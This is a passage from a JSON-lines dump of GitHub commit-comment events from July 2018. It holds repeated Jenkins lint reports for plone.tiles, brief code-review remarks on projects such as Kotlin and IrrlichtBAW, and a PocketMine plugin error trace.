quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T10:36:11Z"}
{"id":"7922379846","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604509,"position":61,"line":61,"path":"idea/src/org/jetbrains/kotlin/idea/quickfix/WrapWithCollectionLiteralCallFix.kt","commit_id":"7a6a7877c7ed98318125b7ca17f762d5d841061c","created_at":"2018-07-05T10:36:34Z","updated_at":"2018-07-05T10:36:34Z","author_association":"MEMBER","body":"Will try to support"}},"created_at":"2018-07-05T10:36:34Z"}
{"id":"7922383355","type":"CommitCommentEvent","actor":{"login":"ccassidy-wrs"},"repo":{"name":"Wind-River/meta-device-cloud"},"payload":{"comment":{"id":29604516,"position":null,"line":null,"path":null,"commit_id":"f5e684d1805e2bdc2962ec75c2239bebff63c742","created_at":"2018-07-05T10:37:21Z","updated_at":"2018-07-05T10:37:21Z","author_association":"COLLABORATOR","body":"Changing name of post install instruction to \"pkg_postinst_ontarget_${PN}\" means the step is no longer implemented.\r\n\r\nCan we revert to \"pkg_postinst_${PN}\" ?"}},"created_at":"2018-07-05T10:37:21Z"}
{"id":"7922384659","type":"CommitCommentEvent","actor":{"login":"maowerner"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604519,"position":23,"line":978,"path":"modules/Correlators.cpp","commit_id":"a96ebbfa5f7317f213b81078668829cf5ff3bf03","created_at":"2018-07-05T10:37:38Z","updated_at":"2018-07-05T10:37:38Z","author_association":"COLLABORATOR","body":"Here the factors are gone"}},"created_at":"2018-07-05T10:37:38Z"}
{"id":"7922399785","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604552,"position":2,"line":2,"path":"idea/resources/postfixTemplates/KtWrapWithCallPostfixTemplate/after.kt.template","commit_id":"d2eb3805c38f14bea707d8695f21a6d37f6b25f1","created_at":"2018-07-05T10:40:54Z","updated_at":"2018-07-05T10:40:54Z","author_association":"MEMBER","body":"Please also define `spot` markers in this template."}},"created_at":"2018-07-05T10:40:54Z"}
{"id":"7922400148","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604554,"position":5,"line":62,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/KtPostfixTemplateProvider.kt","commit_id":"d2eb3805c38f14bea707d8695f21a6d37f6b25f1","created_at":"2018-07-05T10:40:58Z","updated_at":"2018-07-05T10:40:58Z","author_association":"MEMBER","body":"Probably \"after\" template should also be parameterized, otherwise `listOf(s)` is showed as result for any modification."}},"created_at":"2018-07-05T10:40:58Z"}
{"id":"7922402306","type":"CommitCommentEvent","actor":{"login":"maowerner"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604558,"position":47,"line":302,"path":"include/DilutedFactor.h","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T10:41:27Z","updated_at":"2018-07-05T10:41:27Z","author_association":"COLLABORATOR","body":"Would be cleaner, but double / int will be casted to double implicitly as well"}},"created_at":"2018-07-05T10:41:27Z"}
{"id":"7922403574","type":"CommitCommentEvent","actor":{"login":"mateuspatricio"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":29604560,"position":null,"line":null,"path":null,"commit_id":"b22c31f226bcb6f8fb7fd294fb05f5dd8ca74a6e","created_at":"2018-07-05T10:41:44Z","updated_at":"2018-07-05T10:41:44Z","author_association":"CONTRIBUTOR","body":"That's correct. It is not used. I'll remove it."}},"created_at":"2018-07-05T10:41:44Z"}
{"id":"7922405572","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604563,"position":null,"line":null,"path":null,"commit_id":"0c6328df93637912c0f7f760ac680f1f90aa4d0c","created_at":"2018-07-05T10:42:11Z","updated_at":"2018-07-05T10:42:11Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/26/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T10:42:11Z"}
{"id":"7922405951","type":"CommitCommentEvent","actor":{"login":"maowerner"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604564,"position":280,"line":978,"path":"modules/Correlators.cpp","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T10:42:15Z","updated_at":"2018-07-05T10:42:15Z","author_association":"COLLABORATOR","body":"Normalization was hardcoded to 5 random vectors. It was deleted the following commit"}},"created_at":"2018-07-05T10:42:15Z"}
{"id":"7922411614","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29604569,"position":6,"line":142,"path":"main/auth/courses_controller.php","commit_id":"9acc02090b90e1fcfb6e63aa90ae09fc17b63c10","created_at":"2018-07-05T10:43:24Z","updated_at":"2018-07-05T10:43:24Z","author_association":"MEMBER","body":"Fixed:\r\n\r\nhttps://github.com/chamilo/chamilo-lms/commit/0bf462dc3b49dc754f2952e7a0021d64c41e003a"}},"created_at":"2018-07-05T10:43:24Z"}
{"id":"7922417280","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29604581,"position":null,"line":null,"path":null,"commit_id":"cd60cda178efc6290ee05bb3abe4cab79c1ad36c","created_at":"2018-07-05T10:44:35Z","updated_at":"2018-07-05T10:44:35Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-251](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-251).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-251-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-05T10:44:35Z"}
{"id":"7922422101","type":"CommitCommentEvent","actor":{"login":"scottbelden"},"repo":{"name":"fastavro/fastavro"},"payload":{"comment":{"id":29604591,"position":null,"line":null,"path":null,"commit_id":"a8d27f1dcf1be1ba881e12a8eb6715d29f62f622","created_at":"2018-07-05T10:45:33Z","updated_at":"2018-07-05T10:45:33Z","author_association":"COLLABORATOR","body":"Nothing replaces it exactly at the moment. In general I imagine using `writer` or `schemaless_writer` would suffice. If you let me know how you were previously using it I could make a suggestion."}},"created_at":"2018-07-05T10:45:33Z"}
{"id":"7922424978","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604597,"position":null,"line":null,"path":null,"commit_id":"a4d820dd6d27f042b84ffa6086a899570b4da1ce","created_at":"2018-07-05T10:46:10Z","updated_at":"2018-07-05T10:46:10Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/27/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T10:46:10Z"}
{"id":"7922427708","type":"CommitCommentEvent","actor":{"login":"Tr0j4n9"},"repo":{"name":"toastdriven/shell"},"payload":{"comment":{"id":29604599,"position":null,"line":null,"path":null,"commit_id":"e7ac5a129c62786b52cb7a56d51239f1c46cf23d","created_at":"2018-07-05T10:46:45Z","updated_at":"2018-07-05T10:46:45Z","author_association":"NONE","body":"😂"}},"created_at":"2018-07-05T10:46:45Z"}
{"id":"7922429552","type":"CommitCommentEvent","actor":{"login":"cubesky"},"repo":{"name":"Magisk-Modules-Repo/MiPushFake"},"payload":{"comment":{"id":29604602,"position":null,"line":null,"path":null,"commit_id":"0f4726b98cb0cf58b140ab7025ecc14d6489c9d1","created_at":"2018-07-05T10:47:10Z","updated_at":"2018-07-05T10:47:10Z","author_association":"COLLABORATOR","body":"此问题已在最新版本中修复，请更新最新版模块"}},"created_at":"2018-07-05T10:47:10Z"}
{"id":"7922430787","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29604607,"position":30,"line":2869,"path":"addons/web/static/tests/views/kanban_tests.js","commit_id":"be87510c1ecd6f1a7eff5724e1643eebb082208a","created_at":"2018-07-05T10:47:25Z","updated_at":"2018-07-05T10:47:25Z","author_association":"NONE","body":"return def.then(_.constant(result));"}},"created_at":"2018-07-05T10:47:25Z"}
{"id":"7922431249","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29604608,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T10:47:31Z","updated_at":"2018-07-05T10:47:31Z","author_association":"CONTRIBUTOR","body":"@Snow-Pyon "}},"created_at":"2018-07-05T10:47:31Z"}
{"id":"7922432928","type":"CommitCommentEvent","actor":{"login":"cubesky"},"repo":{"name":"Magisk-Modules-Repo/MiPushFake"},"payload":{"comment":{"id":29604611,"position":3,"line":3,"path":"common/system.prop","commit_id":"0f4726b98cb0cf58b140ab7025ecc14d6489c9d1","created_at":"2018-07-05T10:47:53Z","updated_at":"2018-07-05T10:47:53Z","author_association":"COLLABORATOR","body":"此问题已在最新版中修复，请升级到最新版模块"}},"created_at":"2018-07-05T10:47:53Z"}
{"id":"7922433049","type":"CommitCommentEvent","actor":{"login":"impactotecnologico"},"repo":{"name":"impactotecnologico/wso2-rest-base"},"payload":{"comment":{"id":29604612,"position":null,"line":null,"path":null,"commit_id":"42d582cd5c20f72e83d85fbb502a69a2c87d4278","created_at":"2018-07-05T10:47:55Z","updated_at":"2018-07-05T10:47:55Z","author_association":"OWNER","body":"Vamos a limpiar los comentarios innecesarios por favor\n\n\n[CodeFactor](https://www.codefactor.io/repository/github/impactotecnologico/wso2-rest-base/overview/master) found an issue: Resolve unexpected comment.\n\nIt's currently on:\n[src\\main\\java\\net\\impactotecnologico\\ms\\service\\HelloService.java:29\n](https://www.codefactor.io/repository/github/impactotecnologico/wso2-rest-base/source/master/src/main/java/net/impactotecnologico/ms/service/HelloService.java#L29)Commit 42d582cd5c20f72e83d85fbb502a69a2c87d4278"}},"created_at":"2018-07-05T10:47:55Z"}
{"id":"7922437189","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604617,"position":75,"line":873,"path":"modules/Correlators.cpp","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T10:48:48Z","updated_at":"2018-07-05T10:48:48Z","author_association":"COLLABORATOR","body":"triple back-ticks"}},"created_at":"2018-07-05T10:48:48Z"}
{"id":"7922439039","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604625,"position":23,"line":978,"path":"modules/Correlators.cpp","commit_id":"a96ebbfa5f7317f213b81078668829cf5ff3bf03","created_at":"2018-07-05T10:49:13Z","updated_at":"2018-07-05T10:49:13Z","author_association":"COLLABORATOR","body":"very good"}},"created_at":"2018-07-05T10:49:13Z"}
{"id":"7922444501","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604641,"position":5,"line":62,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/KtPostfixTemplateProvider.kt","commit_id":"d2eb3805c38f14bea707d8695f21a6d37f6b25f1","created_at":"2018-07-05T10:50:23Z","updated_at":"2018-07-05T10:50:23Z","author_association":"MEMBER","body":"AFAIK, it's only showed in the settings. Am I wrong?"}},"created_at":"2018-07-05T10:50:23Z"}
{"id":"7922444523","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"PrimeGamesDevTeam/VPNGuard"},"payload":{"comment":{"id":29604642,"position":null,"line":null,"path":null,"commit_id":"a2e946b6895a694b37bf1d3588a6d222d55ce866","created_at":"2018-07-05T10:50:24Z","updated_at":"2018-07-05T10:50:24Z","author_association":"NONE","body":"@95CivicSi \r\n\r\nI tested it in API 3.0.0 (plugin.yml) and i have this issue\r\nVPNGuard don't work\r\n\r\n```\r\n2018-07-05 [10:40:29] [Server thread/INFO]: Playertest[/xxx.xxx.xxx.x:1088] logged in with entity id 181 at (lobby, 256, 69, 256)\r\n2018-07-05 [10:40:31] [Server thread/INFO]: [VPNGuard] Player Playertest has connected with the IP: xxx.xxx.xxx.x\r\n2018-07-05 [10:40:31] [Server thread/CRITICAL]: Could not pass event 'pocketmine\\event\\player\\PlayerJoinEvent' to 'VPNGuard v1.0.6-fiber1': Call to undefined method pocketmine\\Server::getScheduler() on basprohop\\VPNGuard\r\n2018-07-05 [10:40:31] [Server thread/CRITICAL]: Error: \"Call to undefined method pocketmine\\Server::getScheduler()\" (EXCEPTION) in \"VPNGuard_dev-14.phar/src/basprohop/VPNGuard\" at line 90\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #0 src/pocketmine/plugin/MethodEventExecutor(38): basprohop\\VPNGuard->onPlayerLogin(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #1 src/pocketmine/plugin/RegisteredListener(98): pocketmine\\plugin\\MethodEventExecutor->execute(basprohop\\VPNGuard object, pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #2 src/pocketmine/plugin/PluginManager(756): pocketmine\\plugin\\RegisteredListener->callEvent(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #3 src/pocketmine/Player(1029): pocketmine\\plugin\\PluginManager->callEvent(pocketmine\\event\\player\\PlayerJoinEvent object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #4 src/pocketmine/Player(977): pocketmine\\Player->doFirstSpawn()\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #5 src/pocketmine/level/Level(2462): pocketmine\\Player->sendChunk(integer 14, integer 19, pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #6 src/pocketmine/level/Level(2508): pocketmine\\level\\Level->sendChunkFromCache(integer 14, integer 19)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #7 src/pocketmine/level/format/io/ChunkRequestTask(88): pocketmine\\level\\Level->chunkRequestCallback(integer 14, integer 19, pocketmine\\network\\mcpe\\protocol\\BatchPacket object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #8 src/pocketmine/scheduler/AsyncPool(285): pocketmine\\level\\format\\io\\ChunkRequestTask->onCompletion(pocketmine\\Server object)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #9 src/pocketmine/Server(2508): pocketmine\\scheduler\\AsyncPool->collectTasks()\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #10 src/pocketmine/Server(2255): pocketmine\\Server->tick()\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #11 src/pocketmine/Server(2129): pocketmine\\Server->tickProcessor()\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #12 src/pocketmine/Server(1710): pocketmine\\Server->start()\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #13 src/pocketmine/PocketMine(237): pocketmine\\Server->__construct(BaseClassLoader object, pocketmine\\utils\\MainLogger object, string /home/myservertest/, string /home/myservertest/plugins/)\r\n2018-07-05 [10:40:31] [Server thread/DEBUG]: #14 /home/myservertest/PocketMine-MP.phar(1): require(string phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/PocketMine.php)\r\n2018-07-05 [10:40:31] [Server thread/INFO]: Playertest joined the game\r\n```"}},"created_at":"2018-07-05T10:50:24Z"}
{"id":"7922447268","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604646,"position":49,"line":49,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T10:50:58Z","updated_at":"2018-07-05T10:50:58Z","author_association":"NONE","body":"should really be called `batchSize` or `batchSizes` to be less misleading. Also why are all the same size?"}},"created_at":"2018-07-05T10:50:58Z"}
{"id":"7922455711","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604664,"position":50,"line":50,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T10:52:46Z","updated_at":"2018-07-05T10:52:46Z","author_association":"NONE","body":"call it `uboStructSizes`"}},"created_at":"2018-07-05T10:52:46Z"}
{"id":"7922457553","type":"CommitCommentEvent","actor":{"login":"varkor"},"repo":{"name":"varkor/rust"},"payload":{"comment":{"id":29604670,"position":15,"line":393,"path":"src/librustc/hir/mod.rs","commit_id":"3f16739edeb8c9bb2b3228b682e0e5f1039f1c17","created_at":"2018-07-05T10:53:12Z","updated_at":"2018-07-05T10:53:12Z","author_association":"OWNER","body":"`ConstArg` can probably be inlined directly into `GenericArg` if it's not used anywhere else."}},"created_at":"2018-07-05T10:53:12Z"}
{"id":"7922459308","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604676,"position":47,"line":47,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T10:53:33Z","updated_at":"2018-07-05T10:53:33Z","author_association":"NONE","body":"This could and should actually be variable between the 100 individual meshes"}},"created_at":"2018-07-05T10:53:33Z"}
